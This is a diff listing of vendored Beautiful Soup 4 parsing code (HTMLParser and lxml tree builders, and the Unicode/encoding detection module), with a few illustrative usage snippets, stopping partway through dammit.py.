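print soup.prettify()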
262
PortalAuth/includes/scripts/libs/bs4/builder/_htmlparser.py
Executable file
262
PortalAuth/includes/scripts/libs/bs4/builder/_htmlparser.py
Executable file
@@ -0,0 +1,262 @@
|
||||
"""Use the HTMLParser library to parse HTML files that aren't too bad."""
|
||||
|
||||
__all__ = [
|
||||
'HTMLParserTreeBuilder',
|
||||
]
|
||||
|
||||
from HTMLParser import HTMLParser
|
||||
|
||||
try:
|
||||
from HTMLParser import HTMLParseError
|
||||
except ImportError, e:
|
||||
# HTMLParseError is removed in Python 3.5. Since it can never be
|
||||
# thrown in 3.5, we can just define our own class as a placeholder.
|
||||
class HTMLParseError(Exception):
|
||||
pass
|
||||
|
||||
import sys
|
||||
import warnings
|
||||
|
||||
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
|
||||
# argument, which we'd like to set to False. Unfortunately,
|
||||
# http://bugs.python.org/issue13273 makes strict=True a better bet
|
||||
# before Python 3.2.3.
|
||||
#
|
||||
# At the end of this file, we monkeypatch HTMLParser so that
|
||||
# strict=True works well on Python 3.2.2.
|
||||
major, minor, release = sys.version_info[:3]
|
||||
CONSTRUCTOR_TAKES_STRICT = major == 3 and minor == 2 and release >= 3
|
||||
CONSTRUCTOR_STRICT_IS_DEPRECATED = major == 3 and minor == 3
|
||||
CONSTRUCTOR_TAKES_CONVERT_CHARREFS = major == 3 and minor >= 4
|
||||
|
||||
|
||||
from bs4.element import (
|
||||
CData,
|
||||
Comment,
|
||||
Declaration,
|
||||
Doctype,
|
||||
ProcessingInstruction,
|
||||
)
|
||||
from bs4.dammit import EntitySubstitution, UnicodeDammit
|
||||
|
||||
from bs4.builder import (
|
||||
HTML,
|
||||
HTMLTreeBuilder,
|
||||
STRICT,
|
||||
)
|
||||
|
||||
|
||||
HTMLPARSER = 'html.parser'
|
||||
|
||||
class BeautifulSoupHTMLParser(HTMLParser):
|
||||
def handle_starttag(self, name, attrs):
|
||||
# XXX namespace
|
||||
attr_dict = {}
|
||||
for key, value in attrs:
|
||||
# Change None attribute values to the empty string
|
||||
# for consistency with the other tree builders.
|
||||
if value is None:
|
||||
value = ''
|
||||
attr_dict[key] = value
|
||||
attrvalue = '""'
|
||||
self.soup.handle_starttag(name, None, None, attr_dict)
|
||||
|
||||
def handle_endtag(self, name):
|
||||
self.soup.handle_endtag(name)
|
||||
|
||||
def handle_data(self, data):
|
||||
self.soup.handle_data(data)
|
||||
|
||||
def handle_charref(self, name):
|
||||
# XXX workaround for a bug in HTMLParser. Remove this once
|
||||
# it's fixed in all supported versions.
|
||||
# http://bugs.python.org/issue13633
|
||||
if name.startswith('x'):
|
||||
real_name = int(name.lstrip('x'), 16)
|
||||
elif name.startswith('X'):
|
||||
real_name = int(name.lstrip('X'), 16)
|
||||
else:
|
||||
real_name = int(name)
|
||||
|
||||
try:
|
||||
data = unichr(real_name)
|
||||
except (ValueError, OverflowError), e:
|
||||
data = u"\N{REPLACEMENT CHARACTER}"
|
||||
|
||||
self.handle_data(data)
|
||||
|
||||
def handle_entityref(self, name):
|
||||
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
|
||||
if character is not None:
|
||||
data = character
|
||||
else:
|
||||
data = "&%s;" % name
|
||||
self.handle_data(data)
|
||||
|
||||
def handle_comment(self, data):
|
||||
self.soup.endData()
|
||||
self.soup.handle_data(data)
|
||||
self.soup.endData(Comment)
|
||||
|
||||
def handle_decl(self, data):
|
||||
self.soup.endData()
|
||||
if data.startswith("DOCTYPE "):
|
||||
data = data[len("DOCTYPE "):]
|
||||
elif data == 'DOCTYPE':
|
||||
# i.e. "<!DOCTYPE>"
|
||||
data = ''
|
||||
self.soup.handle_data(data)
|
||||
self.soup.endData(Doctype)
|
||||
|
||||
def unknown_decl(self, data):
|
||||
if data.upper().startswith('CDATA['):
|
||||
cls = CData
|
||||
data = data[len('CDATA['):]
|
||||
else:
|
||||
cls = Declaration
|
||||
self.soup.endData()
|
||||
self.soup.handle_data(data)
|
||||
self.soup.endData(cls)
|
||||
|
||||
def handle_pi(self, data):
|
||||
self.soup.endData()
|
||||
self.soup.handle_data(data)
|
||||
self.soup.endData(ProcessingInstruction)
|
||||
|
||||
|
||||
class HTMLParserTreeBuilder(HTMLTreeBuilder):
|
||||
|
||||
is_xml = False
|
||||
picklable = True
|
||||
NAME = HTMLPARSER
|
||||
features = [NAME, HTML, STRICT]
|
||||
|
||||
def __init__(self, *args, **kwargs):
|
||||
if CONSTRUCTOR_TAKES_STRICT and not CONSTRUCTOR_STRICT_IS_DEPRECATED:
|
||||
kwargs['strict'] = False
|
||||
if CONSTRUCTOR_TAKES_CONVERT_CHARREFS:
|
||||
kwargs['convert_charrefs'] = False
|
||||
self.parser_args = (args, kwargs)
|
||||
|
||||
def prepare_markup(self, markup, user_specified_encoding=None,
|
||||
document_declared_encoding=None, exclude_encodings=None):
|
||||
"""
|
||||
:return: A 4-tuple (markup, original encoding, encoding
|
||||
declared within markup, whether any characters had to be
|
||||
replaced with REPLACEMENT CHARACTER).
|
||||
"""
|
||||
if isinstance(markup, unicode):
|
||||
yield (markup, None, None, False)
|
||||
return
|
||||
|
||||
try_encodings = [user_specified_encoding, document_declared_encoding]
|
||||
dammit = UnicodeDammit(markup, try_encodings, is_html=True,
|
||||
exclude_encodings=exclude_encodings)
|
||||
yield (dammit.markup, dammit.original_encoding,
|
||||
dammit.declared_html_encoding,
|
||||
dammit.contains_replacement_characters)
|
||||
|
||||
def feed(self, markup):
|
||||
args, kwargs = self.parser_args
|
||||
parser = BeautifulSoupHTMLParser(*args, **kwargs)
|
||||
parser.soup = self.soup
|
||||
try:
|
||||
parser.feed(markup)
|
||||
except HTMLParseError, e:
|
||||
warnings.warn(RuntimeWarning(
|
||||
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
|
||||
raise e
|
||||
|
||||
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
|
||||
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
|
||||
# string.
|
||||
#
|
||||
# XXX This code can be removed once most Python 3 users are on 3.2.3.
|
||||
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
|
||||
import re
|
||||
attrfind_tolerant = re.compile(
|
||||
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
|
||||
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
|
||||
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
|
||||
|
||||
locatestarttagend = re.compile(r"""
|
||||
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
|
||||
(?:\s+ # whitespace before attribute name
|
||||
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
|
||||
(?:\s*=\s* # value indicator
|
||||
(?:'[^']*' # LITA-enclosed value
|
||||
|\"[^\"]*\" # LIT-enclosed value
|
||||
|[^'\">\s]+ # bare value
|
||||
)
|
||||
)?
|
||||
)
|
||||
)*
|
||||
\s* # trailing whitespace
|
||||
""", re.VERBOSE)
|
||||
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
|
||||
|
||||
from html.parser import tagfind, attrfind
|
||||
|
||||
def parse_starttag(self, i):
|
||||
self.__starttag_text = None
|
||||
endpos = self.check_for_whole_start_tag(i)
|
||||
if endpos < 0:
|
||||
return endpos
|
||||
rawdata = self.rawdata
|
||||
self.__starttag_text = rawdata[i:endpos]
|
||||
|
||||
# Now parse the data between i+1 and j into a tag and attrs
|
||||
attrs = []
|
||||
match = tagfind.match(rawdata, i+1)
|
||||
assert match, 'unexpected call to parse_starttag()'
|
||||
k = match.end()
|
||||
self.lasttag = tag = rawdata[i+1:k].lower()
|
||||
while k < endpos:
|
||||
if self.strict:
|
||||
m = attrfind.match(rawdata, k)
|
||||
else:
|
||||
m = attrfind_tolerant.match(rawdata, k)
|
||||
if not m:
|
||||
break
|
||||
attrname, rest, attrvalue = m.group(1, 2, 3)
|
||||
if not rest:
|
||||
attrvalue = None
|
||||
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
|
||||
attrvalue[:1] == '"' == attrvalue[-1:]:
|
||||
attrvalue = attrvalue[1:-1]
|
||||
if attrvalue:
|
||||
attrvalue = self.unescape(attrvalue)
|
||||
attrs.append((attrname.lower(), attrvalue))
|
||||
k = m.end()
|
||||
|
||||
end = rawdata[k:endpos].strip()
|
||||
if end not in (">", "/>"):
|
||||
lineno, offset = self.getpos()
|
||||
if "\n" in self.__starttag_text:
|
||||
lineno = lineno + self.__starttag_text.count("\n")
|
||||
offset = len(self.__starttag_text) \
|
||||
- self.__starttag_text.rfind("\n")
|
||||
else:
|
||||
offset = offset + len(self.__starttag_text)
|
||||
if self.strict:
|
||||
self.error("junk characters in start tag: %r"
|
||||
% (rawdata[k:endpos][:20],))
|
||||
self.handle_data(rawdata[i:endpos])
|
||||
return endpos
|
||||
if end.endswith('/>'):
|
||||
# XHTML-style empty tag: <span attr="value" />
|
||||
self.handle_startendtag(tag, attrs)
|
||||
else:
|
||||
self.handle_starttag(tag, attrs)
|
||||
if tag in self.CDATA_CONTENT_ELEMENTS:
|
||||
self.set_cdata_mode(tag)
|
||||
return endpos
|
||||
|
||||
def set_cdata_mode(self, elem):
|
||||
self.cdata_elem = elem.lower()
|
||||
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
|
||||
|
||||
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
|
||||
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
|
||||
|
||||
CONSTRUCTOR_TAKES_STRICT = True
|
||||
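A minimal, illustrative use of the builder defined above (not part of the shipped file): passing the feature name "html.parser" selects HTMLParserTreeBuilder, which needs no third-party parser.

# Illustrative sketch only.
from bs4 import BeautifulSoup

soup = BeautifulSoup("<a href='/portal'>Sign in</a>", "html.parser")
print soup.a['href']   # -> /portal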
248
PortalAuth/includes/scripts/libs/bs4/builder/_lxml.py
Executable file
@@ -0,0 +1,248 @@
__all__ = [
    'LXMLTreeBuilderForXML',
    'LXMLTreeBuilder',
    ]

from io import BytesIO
from StringIO import StringIO
import collections
from lxml import etree
from bs4.element import (
    Comment,
    Doctype,
    NamespacedAttribute,
    ProcessingInstruction,
)
from bs4.builder import (
    FAST,
    HTML,
    HTMLTreeBuilder,
    PERMISSIVE,
    ParserRejectedMarkup,
    TreeBuilder,
    XML)
from bs4.dammit import EncodingDetector

LXML = 'lxml'

class LXMLTreeBuilderForXML(TreeBuilder):
    DEFAULT_PARSER_CLASS = etree.XMLParser

    is_xml = True

    NAME = "lxml-xml"
    ALTERNATE_NAMES = ["xml"]

    # Well, it's permissive by XML parser standards.
    features = [NAME, LXML, XML, FAST, PERMISSIVE]

    CHUNK_SIZE = 512

    # This namespace mapping is specified in the XML Namespace
    # standard.
    DEFAULT_NSMAPS = {'http://www.w3.org/XML/1998/namespace' : "xml"}

    def default_parser(self, encoding):
        # This can either return a parser object or a class, which
        # will be instantiated with default arguments.
        if self._default_parser is not None:
            return self._default_parser
        return etree.XMLParser(
            target=self, strip_cdata=False, recover=True, encoding=encoding)

    def parser_for(self, encoding):
        # Use the default parser.
        parser = self.default_parser(encoding)

        if isinstance(parser, collections.Callable):
            # Instantiate the parser with default arguments
            parser = parser(target=self, strip_cdata=False, encoding=encoding)
        return parser

    def __init__(self, parser=None, empty_element_tags=None):
        # TODO: Issue a warning if parser is present but not a
        # callable, since that means there's no way to create new
        # parsers for different encodings.
        self._default_parser = parser
        if empty_element_tags is not None:
            self.empty_element_tags = set(empty_element_tags)
        self.soup = None
        self.nsmaps = [self.DEFAULT_NSMAPS]

    def _getNsTag(self, tag):
        # Split the namespace URL out of a fully-qualified lxml tag
        # name. Copied from lxml's src/lxml/sax.py.
        if tag[0] == '{':
            return tuple(tag[1:].split('}', 1))
        else:
            return (None, tag)

    def prepare_markup(self, markup, user_specified_encoding=None,
                       exclude_encodings=None,
                       document_declared_encoding=None):
        """
        :yield: A series of 4-tuples.
         (markup, encoding, declared encoding,
          has undergone character replacement)

        Each 4-tuple represents a strategy for parsing the document.
        """
        if isinstance(markup, unicode):
            # We were given Unicode. Maybe lxml can parse Unicode on
            # this system?
            yield markup, None, document_declared_encoding, False

        if isinstance(markup, unicode):
            # No, apparently not. Convert the Unicode to UTF-8 and
            # tell lxml to parse it as UTF-8.
            yield (markup.encode("utf8"), "utf8",
                   document_declared_encoding, False)

        # Instead of using UnicodeDammit to convert the bytestring to
        # Unicode using different encodings, use EncodingDetector to
        # iterate over the encodings, and tell lxml to try to parse
        # the document as each one in turn.
        is_html = not self.is_xml
        try_encodings = [user_specified_encoding, document_declared_encoding]
        detector = EncodingDetector(
            markup, try_encodings, is_html, exclude_encodings)
        for encoding in detector.encodings:
            yield (detector.markup, encoding, document_declared_encoding, False)

    def feed(self, markup):
        if isinstance(markup, bytes):
            markup = BytesIO(markup)
        elif isinstance(markup, unicode):
            markup = StringIO(markup)

        # Call feed() at least once, even if the markup is empty,
        # or the parser won't be initialized.
        data = markup.read(self.CHUNK_SIZE)
        try:
            self.parser = self.parser_for(self.soup.original_encoding)
            self.parser.feed(data)
            while len(data) != 0:
                # Now call feed() on the rest of the data, chunk by chunk.
                data = markup.read(self.CHUNK_SIZE)
                if len(data) != 0:
                    self.parser.feed(data)
            self.parser.close()
        except (UnicodeDecodeError, LookupError, etree.ParserError), e:
            raise ParserRejectedMarkup(str(e))

    def close(self):
        self.nsmaps = [self.DEFAULT_NSMAPS]

    def start(self, name, attrs, nsmap={}):
        # Make sure attrs is a mutable dict--lxml may send an immutable dictproxy.
        attrs = dict(attrs)
        nsprefix = None
        # Invert each namespace map as it comes in.
        if len(self.nsmaps) > 1:
            # There are no new namespaces for this tag, but
            # non-default namespaces are in play, so we need a
            # separate tag stack to know when they end.
            self.nsmaps.append(None)
        elif len(nsmap) > 0:
            # A new namespace mapping has come into play.
            inverted_nsmap = dict((value, key) for key, value in nsmap.items())
            self.nsmaps.append(inverted_nsmap)
            # Also treat the namespace mapping as a set of attributes on the
            # tag, so we can recreate it later.
            attrs = attrs.copy()
            for prefix, namespace in nsmap.items():
                attribute = NamespacedAttribute(
                    "xmlns", prefix, "http://www.w3.org/2000/xmlns/")
                attrs[attribute] = namespace

        # Namespaces are in play. Find any attributes that came in
        # from lxml with namespaces attached to their names, and
        # turn them into NamespacedAttribute objects.
        new_attrs = {}
        for attr, value in attrs.items():
            namespace, attr = self._getNsTag(attr)
            if namespace is None:
                new_attrs[attr] = value
            else:
                nsprefix = self._prefix_for_namespace(namespace)
                attr = NamespacedAttribute(nsprefix, attr, namespace)
                new_attrs[attr] = value
        attrs = new_attrs

        namespace, name = self._getNsTag(name)
        nsprefix = self._prefix_for_namespace(namespace)
        self.soup.handle_starttag(name, namespace, nsprefix, attrs)

    def _prefix_for_namespace(self, namespace):
        """Find the currently active prefix for the given namespace."""
        if namespace is None:
            return None
        for inverted_nsmap in reversed(self.nsmaps):
            if inverted_nsmap is not None and namespace in inverted_nsmap:
                return inverted_nsmap[namespace]
        return None

    def end(self, name):
        self.soup.endData()
        completed_tag = self.soup.tagStack[-1]
        namespace, name = self._getNsTag(name)
        nsprefix = None
        if namespace is not None:
            for inverted_nsmap in reversed(self.nsmaps):
                if inverted_nsmap is not None and namespace in inverted_nsmap:
                    nsprefix = inverted_nsmap[namespace]
                    break
        self.soup.handle_endtag(name, nsprefix)
        if len(self.nsmaps) > 1:
            # This tag, or one of its parents, introduced a namespace
            # mapping, so pop it off the stack.
            self.nsmaps.pop()

    def pi(self, target, data):
        self.soup.endData()
        self.soup.handle_data(target + ' ' + data)
        self.soup.endData(ProcessingInstruction)

    def data(self, content):
        self.soup.handle_data(content)

    def doctype(self, name, pubid, system):
        self.soup.endData()
        doctype = Doctype.for_name_and_ids(name, pubid, system)
        self.soup.object_was_parsed(doctype)

    def comment(self, content):
        "Handle comments as Comment objects."
        self.soup.endData()
        self.soup.handle_data(content)
        self.soup.endData(Comment)

    def test_fragment_to_document(self, fragment):
        """See `TreeBuilder`."""
        return u'<?xml version="1.0" encoding="utf-8"?>\n%s' % fragment


class LXMLTreeBuilder(HTMLTreeBuilder, LXMLTreeBuilderForXML):

    NAME = LXML
    ALTERNATE_NAMES = ["lxml-html"]

    features = ALTERNATE_NAMES + [NAME, HTML, FAST, PERMISSIVE]
    is_xml = False

    def default_parser(self, encoding):
        return etree.HTMLParser

    def feed(self, markup):
        encoding = self.soup.original_encoding
        try:
            self.parser = self.parser_for(encoding)
            self.parser.feed(markup)
            self.parser.close()
        except (UnicodeDecodeError, LookupError, etree.ParserError), e:
            raise ParserRejectedMarkup(str(e))

    def test_fragment_to_document(self, fragment):
        """See `TreeBuilder`."""
        return u'<html><body>%s</body></html>' % fragment
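A minimal, illustrative use of the two builders defined above (assumes lxml is importable; not part of the shipped file): "lxml" selects the HTML builder, and "lxml-xml" (alias "xml") selects the XML builder.

# Illustrative sketch only -- requires lxml.
from bs4 import BeautifulSoup

html_soup = BeautifulSoup("<p>fast HTML parse", "lxml")
xml_soup = BeautifulSoup("<doc><item/></doc>", "lxml-xml")
print html_soup.p
print xml_soup.item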
839
PortalAuth/includes/scripts/libs/bs4/dammit.py
Executable file
@@ -0,0 +1,839 @@
# -*- coding: utf-8 -*-
"""Beautiful Soup bonus library: Unicode, Dammit

This library converts a bytestream to Unicode through any means
necessary. It is heavily based on code from Mark Pilgrim's Universal
Feed Parser. It works best on XML and HTML, but it does not rewrite the
XML or HTML to reflect a new encoding; that's the tree builder's job.
"""

from pdb import set_trace
import codecs
from htmlentitydefs import codepoint2name
import re
import logging
import string

# Import a library to autodetect character encodings.
chardet_type = None
try:
    # First try the fast C implementation.
    #  PyPI package: cchardet
    import cchardet
    def chardet_dammit(s):
        return cchardet.detect(s)['encoding']
except ImportError:
    try:
        # Fall back to the pure Python implementation
        #  Debian package: python-chardet
        #  PyPI package: chardet
        import chardet
        def chardet_dammit(s):
            return chardet.detect(s)['encoding']
        #import chardet.constants
        #chardet.constants._debug = 1
    except ImportError:
        # No chardet available.
        def chardet_dammit(s):
            return None

# Available from http://cjkpython.i18n.org/.
try:
    import iconv_codec
except ImportError:
    pass

xml_encoding_re = re.compile(
    '^<\?.*encoding=[\'"](.*?)[\'"].*\?>'.encode(), re.I)
html_meta_re = re.compile(
    '<\s*meta[^>]+charset\s*=\s*["\']?([^>]*?)[ /;\'">]'.encode(), re.I)

class EntitySubstitution(object):

    """Substitute XML or HTML entities for the corresponding characters."""

    def _populate_class_variables():
        lookup = {}
        reverse_lookup = {}
        characters_for_re = []
        for codepoint, name in list(codepoint2name.items()):
            character = unichr(codepoint)
            if codepoint != 34:
                # There's no point in turning the quotation mark into
                # &quot;, unless it happens within an attribute value, which
                # is handled elsewhere.
                characters_for_re.append(character)
                lookup[character] = name
            # But we do want to turn &quot; into the quotation mark.
            reverse_lookup[name] = character
        re_definition = "[%s]" % "".join(characters_for_re)
        return lookup, reverse_lookup, re.compile(re_definition)
    (CHARACTER_TO_HTML_ENTITY, HTML_ENTITY_TO_CHARACTER,
     CHARACTER_TO_HTML_ENTITY_RE) = _populate_class_variables()

    CHARACTER_TO_XML_ENTITY = {
        "'": "apos",
        '"': "quot",
        "&": "amp",
        "<": "lt",
        ">": "gt",
        }

    BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
                                           "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
                                           ")")

    AMPERSAND_OR_BRACKET = re.compile("([<>&])")

    @classmethod
    def _substitute_html_entity(cls, matchobj):
        entity = cls.CHARACTER_TO_HTML_ENTITY.get(matchobj.group(0))
        return "&%s;" % entity

    @classmethod
    def _substitute_xml_entity(cls, matchobj):
        """Used with a regular expression to substitute the
        appropriate XML entity for an XML special character."""
        entity = cls.CHARACTER_TO_XML_ENTITY[matchobj.group(0)]
        return "&%s;" % entity

    @classmethod
    def quoted_attribute_value(self, value):
        """Make a value into a quoted XML attribute, possibly escaping it.

        Most strings will be quoted using double quotes.

         Bob's Bar -> "Bob's Bar"

        If a string contains double quotes, it will be quoted using
        single quotes.

         Welcome to "my bar" -> 'Welcome to "my bar"'

        If a string contains both single and double quotes, the
        double quotes will be escaped, and the string will be quoted
        using double quotes.

         Welcome to "Bob's Bar" -> "Welcome to &quot;Bob's bar&quot;"
        """
        quote_with = '"'
        if '"' in value:
            if "'" in value:
                # The string contains both single and double
                # quotes.  Turn the double quotes into
                # entities. We quote the double quotes rather than
                # the single quotes because the entity name is
                # "&quot;" whether this is HTML or XML.  If we
                # quoted the single quotes, we'd have to decide
                # between &apos; and &squot;.
                replace_with = "&quot;"
                value = value.replace('"', replace_with)
            else:
                # There are double quotes but no single quotes.
                # We can use single quotes to quote the attribute.
                quote_with = "'"
        return quote_with + value + quote_with

    @classmethod
    def substitute_xml(cls, value, make_quoted_attribute=False):
        """Substitute XML entities for special XML characters.

        :param value: A string to be substituted. The less-than sign
          will become &lt;, the greater-than sign will become &gt;,
          and any ampersands will become &amp;. If you want ampersands
          that appear to be part of an entity definition to be left
          alone, use substitute_xml_containing_entities() instead.

        :param make_quoted_attribute: If True, then the string will be
         quoted, as befits an attribute value.
        """
        # Escape angle brackets and ampersands.
        value = cls.AMPERSAND_OR_BRACKET.sub(
            cls._substitute_xml_entity, value)

        if make_quoted_attribute:
            value = cls.quoted_attribute_value(value)
        return value

    @classmethod
    def substitute_xml_containing_entities(
        cls, value, make_quoted_attribute=False):
        """Substitute XML entities for special XML characters.

        :param value: A string to be substituted. The less-than sign will
          become &lt;, the greater-than sign will become &gt;, and any
          ampersands that are not part of an entity definition will
          become &amp;.

        :param make_quoted_attribute: If True, then the string will be
         quoted, as befits an attribute value.
        """
        # Escape angle brackets, and ampersands that aren't part of
        # entities.
        value = cls.BARE_AMPERSAND_OR_BRACKET.sub(
            cls._substitute_xml_entity, value)

        if make_quoted_attribute:
            value = cls.quoted_attribute_value(value)
        return value

    @classmethod
    def substitute_html(cls, s):
        """Replace certain Unicode characters with named HTML entities.

        This differs from data.encode(encoding, 'xmlcharrefreplace')
        in that the goal is to make the result more readable (to those
        with ASCII displays) rather than to recover from
        errors. There's absolutely nothing wrong with a UTF-8 string
        containing a LATIN SMALL LETTER E WITH ACUTE, but replacing that
        character with "&eacute;" will make it more readable to some
        people.
        """
        return cls.CHARACTER_TO_HTML_ENTITY_RE.sub(
            cls._substitute_html_entity, s)

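# --- Illustrative sketch (not upstream bs4 code, kept in comments so the
# --- module's behavior is unchanged): typical EntitySubstitution usage.
#
#   from bs4.dammit import EntitySubstitution
#   EntitySubstitution.substitute_xml('AT&T <rocks>')
#   # -> 'AT&amp;T &lt;rocks&gt;'
#   EntitySubstitution.quoted_attribute_value('a "b" c')
#   # -> single-quoted, since the value contains double quotes: 'a "b" c'
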
class EncodingDetector:
    """Suggests a number of possible encodings for a bytestring.

    Order of precedence:

    1. Encodings you specifically tell EncodingDetector to try first
    (the override_encodings argument to the constructor).

    2. An encoding declared within the bytestring itself, either in an
    XML declaration (if the bytestring is to be interpreted as an XML
    document), or in a <meta> tag (if the bytestring is to be
    interpreted as an HTML document.)

    3. An encoding detected through textual analysis by chardet,
    cchardet, or a similar external library.

    4. UTF-8.

    5. Windows-1252.
    """
    def __init__(self, markup, override_encodings=None, is_html=False,
                 exclude_encodings=None):
        self.override_encodings = override_encodings or []
        exclude_encodings = exclude_encodings or []
        self.exclude_encodings = set([x.lower() for x in exclude_encodings])
        self.chardet_encoding = None
        self.is_html = is_html
        self.declared_encoding = None

        # First order of business: strip a byte-order mark.
        self.markup, self.sniffed_encoding = self.strip_byte_order_mark(markup)

    def _usable(self, encoding, tried):
        if encoding is not None:
            encoding = encoding.lower()
            if encoding in self.exclude_encodings:
                return False
            if encoding not in tried:
                tried.add(encoding)
                return True
        return False

    @property
    def encodings(self):
        """Yield a number of encodings that might work for this markup."""
        tried = set()
        for e in self.override_encodings:
            if self._usable(e, tried):
                yield e

        # Did the document originally start with a byte-order mark
        # that indicated its encoding?
        if self._usable(self.sniffed_encoding, tried):
            yield self.sniffed_encoding

        # Look within the document for an XML or HTML encoding
        # declaration.
        if self.declared_encoding is None:
            self.declared_encoding = self.find_declared_encoding(
                self.markup, self.is_html)
        if self._usable(self.declared_encoding, tried):
            yield self.declared_encoding

        # Use third-party character set detection to guess at the
        # encoding.
        if self.chardet_encoding is None:
            self.chardet_encoding = chardet_dammit(self.markup)
        if self._usable(self.chardet_encoding, tried):
            yield self.chardet_encoding

        # As a last-ditch effort, try utf-8 and windows-1252.
        for e in ('utf-8', 'windows-1252'):
            if self._usable(e, tried):
                yield e

    @classmethod
    def strip_byte_order_mark(cls, data):
        """If a byte-order mark is present, strip it and return the encoding it implies."""
        encoding = None
        if isinstance(data, unicode):
            # Unicode data cannot have a byte-order mark.
            return data, encoding
        if (len(data) >= 4) and (data[:2] == b'\xfe\xff') \
               and (data[2:4] != '\x00\x00'):
            encoding = 'utf-16be'
            data = data[2:]
        elif (len(data) >= 4) and (data[:2] == b'\xff\xfe') \
                 and (data[2:4] != '\x00\x00'):
            encoding = 'utf-16le'
            data = data[2:]
        elif data[:3] == b'\xef\xbb\xbf':
            encoding = 'utf-8'
            data = data[3:]
        elif data[:4] == b'\x00\x00\xfe\xff':
            encoding = 'utf-32be'
            data = data[4:]
        elif data[:4] == b'\xff\xfe\x00\x00':
            encoding = 'utf-32le'
            data = data[4:]
        return data, encoding

    @classmethod
    def find_declared_encoding(cls, markup, is_html=False, search_entire_document=False):
        """Given a document, tries to find its declared encoding.

        An XML encoding is declared at the beginning of the document.

        An HTML encoding is declared in a <meta> tag, hopefully near the
        beginning of the document.
        """
        if search_entire_document:
            xml_endpos = html_endpos = len(markup)
        else:
            xml_endpos = 1024
            html_endpos = max(2048, int(len(markup) * 0.05))

        declared_encoding = None
        declared_encoding_match = xml_encoding_re.search(markup, endpos=xml_endpos)
        if not declared_encoding_match and is_html:
            declared_encoding_match = html_meta_re.search(markup, endpos=html_endpos)
        if declared_encoding_match is not None:
            declared_encoding = declared_encoding_match.groups()[0].decode(
                'ascii', 'replace')
        if declared_encoding:
            return declared_encoding.lower()
        return None

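# --- Illustrative sketch (not upstream bs4 code, kept in comments): the
# --- encodings property yields candidates in the precedence order above.
#
#   from bs4.dammit import EncodingDetector
#   detector = EncodingDetector(
#       b'<?xml version="1.0" encoding="latin-1"?><doc/>')
#   list(detector.encodings)
#   # -> the declared 'latin-1' first, then any chardet guess,
#   #    then 'utf-8' and 'windows-1252' as fallbacks
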
class UnicodeDammit:
    """A class for detecting the encoding of a *ML document and
    converting it to a Unicode string. If the source encoding is
    windows-1252, can replace MS smart quotes with their HTML or XML
    equivalents."""

    # This dictionary maps commonly seen values for "charset" in HTML
    # meta tags to the corresponding Python codec names. It only covers
    # values that aren't in Python's aliases and can't be determined
    # by the heuristics in find_codec.
    CHARSET_ALIASES = {"macintosh": "mac-roman",
                       "x-sjis": "shift-jis"}

    ENCODINGS_WITH_SMART_QUOTES = [
        "windows-1252",
        "iso-8859-1",
        "iso-8859-2",
        ]

    def __init__(self, markup, override_encodings=[],
                 smart_quotes_to=None, is_html=False, exclude_encodings=[]):
        self.smart_quotes_to = smart_quotes_to
        self.tried_encodings = []
        self.contains_replacement_characters = False
        self.is_html = is_html

        self.detector = EncodingDetector(
            markup, override_encodings, is_html, exclude_encodings)

        # Short-circuit if the data is in Unicode to begin with.
        if isinstance(markup, unicode) or markup == '':
            self.markup = markup
            self.unicode_markup = unicode(markup)
            self.original_encoding = None
            return

        # The encoding detector may have stripped a byte-order mark.
        # Use the stripped markup from this point on.
        self.markup = self.detector.markup

        u = None
        for encoding in self.detector.encodings:
            markup = self.detector.markup
            u = self._convert_from(encoding)
            if u is not None:
                break

        if not u:
            # None of the encodings worked. As an absolute last resort,
            # try them again with character replacement.
            for encoding in self.detector.encodings:
                if encoding != "ascii":
                    u = self._convert_from(encoding, "replace")
                if u is not None:
                    logging.warning(
                        "Some characters could not be decoded, and were "
                        "replaced with REPLACEMENT CHARACTER.")
                    self.contains_replacement_characters = True
                    break

        # If none of that worked, we could at this point force it to
        # ASCII, but that would destroy so much data that I think
        # giving up is better.
        self.unicode_markup = u
        if not u:
            self.original_encoding = None

    def _sub_ms_char(self, match):
        """Changes a MS smart quote character to an XML or HTML
        entity, or an ASCII character."""
        orig = match.group(1)
        if self.smart_quotes_to == 'ascii':
            sub = self.MS_CHARS_TO_ASCII.get(orig).encode()
        else:
            sub = self.MS_CHARS.get(orig)
            if type(sub) == tuple:
                if self.smart_quotes_to == 'xml':
                    sub = '&#x'.encode() + sub[1].encode() + ';'.encode()
                else:
                    sub = '&'.encode() + sub[0].encode() + ';'.encode()
            else:
                sub = sub.encode()
        return sub

    def _convert_from(self, proposed, errors="strict"):
        proposed = self.find_codec(proposed)
        if not proposed or (proposed, errors) in self.tried_encodings:
            return None
        self.tried_encodings.append((proposed, errors))
        markup = self.markup
        # Convert smart quotes to HTML if coming from an encoding
        # that might have them.
        if (self.smart_quotes_to is not None
            and proposed in self.ENCODINGS_WITH_SMART_QUOTES):
            smart_quotes_re = b"([\x80-\x9f])"
            smart_quotes_compiled = re.compile(smart_quotes_re)
            markup = smart_quotes_compiled.sub(self._sub_ms_char, markup)

        try:
            #print "Trying to convert document to %s (errors=%s)" % (
            #    proposed, errors)
            u = self._to_unicode(markup, proposed, errors)
            self.markup = u
            self.original_encoding = proposed
        except Exception as e:
            #print "That didn't work!"
            #print e
            return None
        #print "Correct encoding: %s" % proposed
        return self.markup

    def _to_unicode(self, data, encoding, errors="strict"):
